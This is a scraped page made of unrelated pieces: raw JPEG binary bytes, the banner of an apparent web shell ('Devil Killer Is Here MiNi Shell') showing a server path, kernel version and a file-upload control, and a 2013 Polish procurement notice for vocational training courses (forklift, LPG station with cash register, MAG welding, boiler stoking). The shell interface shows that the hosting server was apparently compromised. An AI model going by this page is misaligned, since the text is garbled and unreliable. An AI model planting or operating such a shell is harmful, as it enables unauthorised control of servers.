JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130521/197500-N-2013.html

<p class="kh_header"><b>Ostrów Wielkopolski: Przygotowanie i przeprowadzenie szkoleń i kursów przewidzianych w projekcie pt. Udział w projekcie szansą na lepsze jutro które Gmina Miasto Ostrów Wielkopolski realizuje w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Europejskiego Funduszu Społecznego: realizacja szkoleń i kursów zawodowych: kurs obsługi wózków widłowych, kurs obsługi stacji LPG z obsługą kasy fiskalnej, podstawowy kurs spawania metodą MAG-135 oraz kurs palacza pieców CO - centralnego ogrzewania na paliwa stałe, ciekłe lub gazowe.</b><br>
<b>Numer ogłoszenia: 197500 - 2013; data zamieszczenia: 21.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Limanowskiego 17, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 5921122 w. 244, faks 062 5921216.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie szkoleń i kursów przewidzianych w projekcie pt. Udział w projekcie szansą na lepsze jutro które Gmina Miasto Ostrów Wielkopolski realizuje w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Europejskiego Funduszu Społecznego: realizacja szkoleń i kursów zawodowych: kurs obsługi wózków widłowych, kurs obsługi stacji LPG z obsługą kasy fiskalnej, podstawowy kurs spawania metodą MAG-135 oraz kurs palacza pieców CO - centralnego ogrzewania na paliwa stałe, ciekłe lub gazowe..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Kurs obsługi wózków widłowych
Ilość osób (uczestników kursu szkolenia) - minimum 20 osób - maksymalnie 32 osoby,
Termin realizacji - sukcesywnie do 15 grudnia 2013 roku
Ilość godzin - RAZEM 67 godzin dla jednego uczestnika (Godzina zegarowa kursu liczy się 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut - długość przerw jest ustalana w sposób elastyczny przez Wykonawcę).
Program powinien miedzy innymi zawierać tematy:
1.	Typy stosowanych wózków jezdniowych - 4 godziny (teoria)
2.	Budowa wózka - 8 godzin (teoria)
3.	Czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkami -8 godzin (teorii)
4.	Czynności operatora w czasie pracy z wózkami - 8 godzin (teoria)
5.	Wiadomości z zakresu ładunkoznawstwa - 4 godziny (teoria)
6.	Wiadomości z zakresu BHP - 8 godzin (teoria)
7.	Wiadomości o dozorze technicznym - 4 godzin (teoria)
8.	Praktyczna nauka jazdy - 15 godzin (nauka jazdy
9.	Wiadomości związane z wymianą butli gazowych - 2 godziny (teoria)
10.	Wymiana butli gazowych - pokaz przez instruktora i samodzielna wymiana przez kursantów - 6 godzin (praktyka)
Wykłady - 44
Nauka jazdy - 15 (dla każdego uczestnika)
Wymiana butli - 8
Miejsce szkolenia - na terenie miasta Ostrowa Wlkp. lub poza miastem Ostrowem Wielkopolskim z zapewnieniem przez firmę szkoleniową dojazdu uczestników projektu do miejsca szkolenia i powrotu uczestników do miejsca zamieszkania.
Cel kursu szkolenia: celem kursu jest przygotowanie do samodzielnej i bezpiecznej obsługi wózków widłowych z napędem spalinowym i elektrycznym,
W cenie szkolenia: 
1.	Zapewnienie sali dydaktycznej oraz palcu manewrowego do praktycznej nauki jazdy. 
2.	Zapewnienie niezbędnego sprzętu umożliwiającego sprawne prowadzenie szkolenia    teoretycznego oraz praktycznego (rzutnik, komputer, flipchart, stoły, krzesła, wózki widłowe itp.) oraz materiałów szkoleniowych w formie papierowej lub CD. 
3.	Materiały szkoleniowe zostaną oznaczone zgodnie z Wytycznymi dotyczącymi oznaczenia projektów w ramach POKL. 
4.	Jeśli zajęcia będą odbywały się poza terenem Ostrowa Wielkopolskiego firma szkoleniowa musi zapewnić transport.
5.	1 egzemplarz materiałów szk. popisany przez os. upoważnioną zostanie przekazany koordynatorowi projektu.
Wykonawca na zajęcia teoretyczne zapewni, co najmniej dwa wózki widłowe, które będą wykorzystywane do nauki jazdy na zajęciach. 
W ramach udzielanego zamówienia Wykonawca zobowiązany jest do zorganizowania egzaminu państwowego UDT (Urząd Dozoru Technicznego) oraz wydanie zaświadczenie ukończenia kursu.
Uczestnicy kursu otrzymają dodatkowo zaświadczenie dotyczące usprawnień w zakresie wymiany butli gazowej.
Wykonawca opłaci wykonanie badań lekarskich przeprowadzonych przez lekarza medycyny pracy. Badanie lekarskie muszą być przeprowadzone przed rozpoczęciem szkolenia przez lekarza medycyny pracy. Badania mają na celu stwierdzenie zdolności do odbycia szkolenia oraz podjęcia zatrudnienia zgodnego z kierunkiem odbytego szkolenia. 
Wykonawca zobowiązany jest do wykonania usługi zgodnie z ogólnymi przepisami BHP (Dz. U. Nr 169 z 2003r.) i p.póź. Wykonawca zobowiązuje się do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników kursów skierowanych przez Zamawiającego
Prowadzenie dokumentacji kursu: 
1.	Sporządzenie harmonogramu spotkań zajęć teoretycznych i praktycznych
2.	Prowadzenie dziennika zajęć edukacyjnych
3.	Prowadzenie listy obecności Beneficjentów na zajęciach
4.	Karta jazdy z zajęć praktycznych
5.	Protokół z egzaminu
6.	Przeprowadzenie ankiety oceny szkolenia dla uczestników. 
W/w dokumenty będą potwierdzone przez wykładowcę podpisem. Oryginały ww dokumentów zostaną przekazane Zleceniodawcy.
Zapewnienie cateringu na zajęciach: do 5 godzin szkolenia catering w postaci przerwy kawowej (kawa, herbata, zimne napoje, ciasto) powyżej 5 godzin szkolenia wykonawca zobowiązuje się zapewnić Beneficjentom ciepły posiłek - obiad jednodaniowy.



2. Kurs ob. stacji LPG z obsługą kasy fiskalnej
Ilość osób (uczestników kursu-szkolenia) - minimum 15 osób - maksymalnie 20 osób,
Termin realizacji - sukcesywnie do 15 grudnia 2013 roku
Ilość godzin - 40 godzin łącznie
1.	Kurs LPG - Liczba godzin: 13 godz. teoretycznych, 7 godz. praktycznych. 
2.	Kasa fiskalna Liczba godzin: 10 godz. teoretycznych, 10godz. praktycznych.
(Godzina zegarowa kursu liczy się 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut - długość przerw jest ustalana w sposób elastyczny przez Wykonawcę).
Miejsce szkolenia - na terenie miasta Ostrowa Wlkp. lub poza miastem Ostrowem Wielkopolskim z zapewnieniem przez firmę szkoleniową dojazdu uczestników projektu do miejsca szkolenia i powrotu uczestników do miejsca zamieszkania.
Cel kursu-szkolenia oraz zakres tematyczny kursu: 
Zajęcia teoretyczne i praktyczne z napełniania zbiorników LPG:
1.	Przekazanie wiedzy niezbędnej do pracy przy instalacjach zasilania pojazdów samochodowych gazem oraz przygotowanie do egzaminu
2.	Wiadomości o właściwościach fizycznych i chemicznych gazów
3.	Gazy stosowane do napędu pojazdów
4.	Instalacje zasilania pojazdów samochodowych i osprzęt zbiorników LPG
5.	Budowa zbiorników LPG
6.	Oznakowanie zbiorników LPG
7.	Warunki dodatkowe stawiane pojazdom napędzanym gazem, 
8.	Napełnianie zbiorników gazem skroplonym LPG - czynności robocze i kontrolne
9.	Podstawowe wiadomości o dozorze technicznym
10.	Przepisy BHP i PPOŻ(Przepisy przeciwpożarowe). 
Liczba godzin: 13 godz. teoretycznych, 7 godz. praktycznych
Zajęcia  teoretyczne i praktyczne z obsługi kasy fiskalnej i terminalu kart płatniczych. 
1.	Program do obsługi kasy fiskalnej i terminalu kart płatniczych - podstawowe pojęcia fiskalne
2.	Podstawowe akty prawne
3.	Kody kreskowe
4.	Podatek od wartości dodanej
5.	Budowa kasy
6.	Rodzaje kart płatniczych
7.	Rodzaje terminalów płatniczych oraz ich budowa i zasady działania
8.	Logowanie użytkowania
9.	Realizacja płatności oraz odwołań
10.	Usterki i sposoby ich rozwiazywania - anulowanie dowolnego elementu transakcji i ostatniej pozycji, kasowanie całej transakcji, zerowanie stanu błędu
11.	Rodzaje płatności na kasie fiskalnej
12.	Programowanie podstawowych parametrów kasy
13.	Sprzedaż na kasie fiskalnej - sprzedaż pojedyncza z powtórzeniem
14.	Wystawianie paragonów fiskalnych
15.	Wpłata i wypłata gotówki
16.	Obrót towarami zwrotnymi
17.	Raporty: raporty fiskalne i podglądowe, dzienne i miesięczne
18.	Zapas gotówki w kasie
19.	Niedobory i nadwyżki w kasie, 
Liczba godzin: 10 godz. teoretycznych, 10godz. praktycznych
W cenie szkolenia:
1.	Zapewnienie sali dydaktycznej wyposażonej w niezbędny sprzęt i urządzenia zapewniające bezpieczne szkolenie oraz przygotowanie do egzaminu. 
2.	Zapewnienie niezbędnego sprzętu umożliwiającego sprawne prowadzenie szkolenia teoretycznego i praktycznego (rzutnik, komputer, flipcharty, stoły, krzesła, kasy fiskalne, terminale kart płatniczych itp.) oraz materiałów szkoleniowych w formie papierowej lub CD. 
3.	Materiały szkoleniowe zostaną oznaczone zgodnie z Wytycznymi dotyczącymi oznaczenia projektów w ramach POKL.
4.	Wykonawca zapewni kasy fiskalne i terminale kart płatniczych na zajęcia teoretyczne w ilości nie mniejszej niż jeden sprzęt na dwóch uczestników szkolenia. 
5.	1 egzemplarz materiałów szk. popisany przez os. upoważnioną zostanie przekazany koordynatorowi projektu
6.	Kserokopie zaświadczenia/certyfikatu potwierdzone za zgodność z oryginałem zostaną przekazane koordynatorowi.
W ramach udzielanego zamówienia Wykonawca zobowiązany jest do zorganizowania egzaminu państwowego TDT ( Transportowy Dozór Techniczny) - kserokopia wydanego uprawnienia zostanie przekazana Zamawiającemu. Na zakończenie szkolenia zostanie przeprowadzony egzamin przez osobę upoważnioną do przeprowadzenia egzaminu.
Wydanie zaświadczeń/certyfikatów ukończenia kursu zgodnie z MEN oraz wytycznymi oznaczenia projektów w ramach POKL.
Wykonawca opłaci wykonanie badań lekarskich przeprowadzonych przez lekarza medycyny pracy. Badania lekarskie muszą być przeprowadzone przed rozpoczęciem szkolenia. Badania mają na celu stwierdzenie zdolności do odbycia szkolenia oraz podjęcia zatrudnienia zgodnego z kierunkiem odbytego szkolenia. Kserokopia zaświadczenia lekarskiego zostanie przekazana Zamawiającemu.
Wykonawca zobowiązany jest do wykonania usługi zgodnie z ogólnymi przepisami BHP (Dz. U. Nr 169 z 2003 r.) i p. póź. Wykonawca zobowiązuje się do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników kursów skierowanych przez Zamawiającego.
Prowadzenie dokumentacji kursu: 
1.	Sporządzenie harmonogramu spotkań teoretycznych i praktycznych
2.	Prowadzenie dziennika zajęć edukacyjnych
3.	 Prowadzenie listy obecności Beneficjentów na zajęciach
4.	Protokołu z egzaminu
5.	Przeprowadzenie ankiety oceny szkolenia dla uczestników. 
W/w dokumenty będą potwierdzone podpisem wykładowcy. Oryginały ww dokumentów zostaną przekazane Zleceniodawcy.
Zapewnienie cateringu na zajęciach - do 5 godzin szkolenia catering w postaci przerwy kawowej (kawa, herbata, zimne napoje, ciasto) powyżej 5 godzin szkolenia wykonawca zobowiązuje się zapewnić Beneficjentom ciepły posiłek - obiad jednodaniowy.
 


3. Kurs spawania
Ilość osób (uczestników kursu/szkolenia) - minimalnie 3 osoby - maksymalnie 9 osób
Termin realizacji - sukcesywnie do 15 grudnia 2013 roku
Ilość godzin -145 godzin dla jednego uczestnika w tym zajęcia teoretyczne 25 godzin i praktyczne 120 godzin. 
Kurs spawania MAG obejmuje 25 jednostek szkoleniowych wykładów teoretycznych i 120 jednostek szkoleniowych ćwiczeń praktycznych. Przez jednostkę szkoleniową należy rozumieć: 
a.	45 minut zajęć w przypadku zajęć teoretycznych i instruktażu wstępnego
b.	60 minut zajęć w przypadku ćwiczeń praktycznych
Miejsce szkolenia - na terenie miasta Ostrowa Wlkp, lub poza miastem Ostrowem Wielkopolskim z zapewnieniem przez firmę szkoleniową dojazdu uczestników projektu do miejsca szkolenia i powrotu uczestników do miejsca zamieszkania.
Cel kursu: celem kursu spawania jest przygotowanie teoretyczne i praktyczne oraz uzyskanie wiedzy i umiejętności spawania w technice zgodnej z prowadzonym kursem oraz uzyskanie uprawnień spawalniczych. Opracowanie programu szkolenia zgodnie z wytycznymi Instytutu Spawalnictwa.  
Program nauczania powinien między innymi zawierać:
Szkolenie teoretyczne:
1.	Zastosowanie elektryczności do spawania łukowego
2.	Urządzenia spawalnicze
3.	Bezpieczeństwo i higiena pracy
4.	Bezpieczna praca na hali produkcyjnej
5.	Materiały dodatkowe do spawania
6.	Spawanie w praktyce
7.	Oznaczenie i wymiarowanie spoin
8.	Metody przygotowania złączy do spawania
9.	Kwalifikowanie spawaczy
10.	Budowa i użytkowanie urządzeń do spawania MAG
11.	Charakterystyka spawania MAG oraz typowe parametry
     Łącznie szkolenie teoretyczne - 25 godz.
Szkolenie praktyczne:
Instruktaż wstępny
Ćwiczenia: 14 ćwiczeń 
Łącznie szkolenie praktyczne - 120 godz. 
Czas trwania i sposób organizacji kursu - łącznie cały kurs - 145 godzin
W cenie szkolenia: 
1.	Zapewnienie sali dydaktycznej oraz pracowni spawalniczej wyposażonej w niezbędny sprzęt i urządzenia zapewniające bezpieczne szkolenie oraz przygotowanie do egzaminu. 
2.	Zapewnienie niezbędnego sprzętu umożliwiającego sprawne prowadzenie szkolenia teoretycznego i praktycznego (rzutnik, komputer, flipchart, stoły, krzesła, materiały spawalnicze itp.) oraz materiałów szkoleniowych w formie papierowej lub CD. 
3.	Materiały szkoleniowe zostaną oznaczone zgodnie z Wytycznymi dotyczącymi oznaczenia projektów w ramach POKL. 
4.	Wykonawca zapewni uczestnikom szkolenia odzież roboczą i ochronną zgodnie z obowiązującymi przepisami BHP. 
5.	1 egzemplarza materiałów szk. popisany przez os. upoważnioną zostanie przekazany koordynatorowi projektu
6.	Kserokopie zaświadczenia/certyfikatu potwierdzone za zgodność z oryginałem zostaną przekazane koordynatorowi
W ramach udzielanego zamówienia Wykonawca zobowiązany jest do zorganizowania egzaminu państwowego.
Przeprowadzenie oraz wydanie dla każdego uczestnika szkolenia książeczki spawacza z uprawnieniami, certyfikat z Instytutu Spawalnictwa, zaświadczenia ukończenia kursu wydanego zgodne z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
Wykonawca opłaci wykonanie badań lekarskich przeprowadzonych przez lekarza medycyny pracy. Badania lekarskie muszą być przeprowadzone przed rozpoczęciem szkolenia przez lekarza medycyny pracy. Badania mają na celu stwierdzenie zdolności do odbycia szkolenia oraz podjęcia zatrudnienia zgodnego z kierunkiem odbytego szkolenia. Wykonawca przekażę kserokopie zaświadczenia wydanego przez lekarza medycyny pracy Zamawiającemu.
Wykonawca zobowiązany jest do wykonania usługi, zgodnie z ogólnymi przepisami BHP (Dz.U.nr 169 z 2003r.) i p.poź. Wykonawca zobowiązuje się do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników kursów skierowanych przez Zamawiającego
Prowadzenie dokumentacji kursu: 
1.	Sporządzenie harmonogramu spotkań zajęć teoretycznych i praktycznych
2.	Prowadzenie dziennika zajęć edukacyjnych
3.	Prowadzenie listy obecności Beneficjentów na zajęciach
4.	Karta zajęć praktycznych
5.	Protokołu z egzaminu
6.	Przeprowadzenie ankiety oceny szkolenia dla uczestników. 
W/w dokumenty będą potwierdzone podpisem wykonawcy. Oryginały ww dokumentów zostaną przekazane Zleceniodawcy.
Zapewnienie cateringu na zajęciach- do 5 godzin szkolenia catering w postaci przerwy kawowej (kawa, herbata, zimne napoje, ciasto) powyżej 5 godzin szkolenia wykonawca zobowiązuje się zapewnić Beneficjentom ciepły posiłek w postaci jednodaniowego obiadu - drugie danie. 



4. Kurs palacz pieców Co
Ilość osób (uczestników kursu/szkolenia) - 2 osoby
Termin realizacji - sukcesywnie do 15 grudnia 2013 roku
Ilość godzin - czas trwania szkolenia - nie mniej niż 30 godzin w tym zajęcia teoretyczne i praktyczne,
Miejsce szkolenia - na terenie miasta Ostrowa Wlkp, lub poza miastem Ostrowem Wielkopolskim z zapewnieniem przez firmę szkoleniową dojazdu uczestników projektu do miejsca szkolenia i powrotu uczestników do miejsca zamieszkania.
Cel kursu oraz zakres tematyczny kursu: 
1.	Przepisy o dozorze technicznym
2.	Organizacja pracy przy urządzeniach cieplnych
3.	Obowiązki palacza pieców CO
4.	Wybrane wiadomości z techniki cieplnej
5.	Armatura i materiały
6.	Schemat kotłowni CO
7.	Woda w gospodarce cieplnej
8.	Kotły parowe i wodne - ogólne wiadomości
9.	Eksploatacja kotłów
10.	Sieci i instalacje cieplne
11.	Przemysłowe urządzenia pary i gorącej wody
12.	Paliwa stałe, paliwa ciekłe, aparatura kontrolna pomiarowa
13.	Zasady BHP ochrona p.poż, ratownictwo medyczne.
W cenie szkolenia: 
1.	Zapewnienie sali dydaktycznej oraz miejsca do odbycia zajęć praktycznych. Sala powinna być wyposażona w niezbędny sprzęt i urządzenia zapewniające bezpieczne szkolenie oraz przygotowanie do egzaminu. 
2.	Zapewnienie niezbędnego sprzętu umożliwiającego sprawne prowadzenie szkolenia teoretycznego i praktycznego (rzutnik, komputer, flipchart, stoły, krzesła itp.) oraz materiałów szkoleniowych w formie papierowej lub CD. 
3.	Materiały szkoleniowe zostaną oznaczone zgodnie z Wytycznymi dotyczącymi oznaczenia projektów w ramach POKL.
4.	1 egzemplarz materiałów szk. popisany przez os. upoważnioną zostanie przekazany koordynatorowi projektu.
5.	Kserokopie zaświadczeniacertyfikatu potwierdzone za zgodność z oryginałem zostaną przekazane koordynatorowi
W ramach udzielanego zamówienia Wykonawca zobowiązany jest do zorganizowania egzaminu państwowego.
Przeprowadzenie państwowego egzaminu kwalifikacyjnego. Wydawane uprawnienia na palacza CO świadectwa kwalifikacji - podstawa prawna DZIENNIK USTAW Z 2003 R. NR 89 POZ. 828 ROZPORZĄDZENIE MINISTRA GOSPODARKI, PRACY I POLITYKI SPOŁECZNEJ1) z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z dnia 21 maja 2003 r.), oraz DZ.U. nr.129 z 22.07.2003 r. poz. 1184, oraz Dz.U. nr.141 z 29.07.2005r. poz.1189 oraz wydanie zaświadczenia ukończenia kursu wydanego zgodne z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
Wykonawca opłaci wykonanie badań lekarskich przeprowadzonych przez lekarza medycyny pracy. Badania lekarskie muszą być przeprowadzone przed rozpoczęciem szkolenia przez lekarza medycyny pracy. Badania mają na celu stwierdzenie zdolności do odbycia szkolenia oraz podjęcia zatrudnienia zgodnego z kierunkiem odbytego szkolenia. Wykonawca przekażę kserokopie zaświadczenia wydanego przez lekarza medycyny pracy Zamawiającemu.
Wykonawca zobowiązany jest do wykonania usługi, zgodnie z ogólnymi przepisami BHP (Dz.U.nr 169 z 2003r.) i p.poż. Wykonawca zobowiązuje się do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników kursów skierowanych przez Zamawiającego
Prowadzenie dokumentacji kursu: 
1.	Sporządzenie harmonogramu spotkań zajęć teoretycznych i praktycznych
2.	Prowadzenie dziennika zajęć edukacyjnych
3.	Prowadzenie listy obecności Beneficjentów na zajęciach, 
4.	Protokołu z egzaminu, przeprowadzenie ankiety oceny szkolenia dla uczestników. 
Ww dokumenty będą potwierdzone podpisem wykonawcy. Oryginały ww dokumentów zostaną przekazane Zleceniodawcy.
Zapewnienie cateringu na zajęciach- do 5 godzin szkolenia catering w postaci przerwy kawowej (kawa, herbata, zimne napoje, ciasto) powyżej 5 godzin szkolenia wykonawca zobowiązuje się zapewnić Beneficjentom ciepły posiłek w postaci jednodaniowego obiadu - drugie danie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.23.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony jeżeli wykonawca ubiegający się o udzielenie zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:
a)	przynajmniej 1 usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. kurs obsługi wózków widłowych,
b)	przynajmniej 1 usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. kurs obsługi stacji LPG z obsługą kasy fiskalnej,
c)	przynajmniej 1 usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. kurs spawania metodą MAG 135,
d)	przynajmniej 1 usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, tj. kurs palacza pieców CO centralnego ogrzewania,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
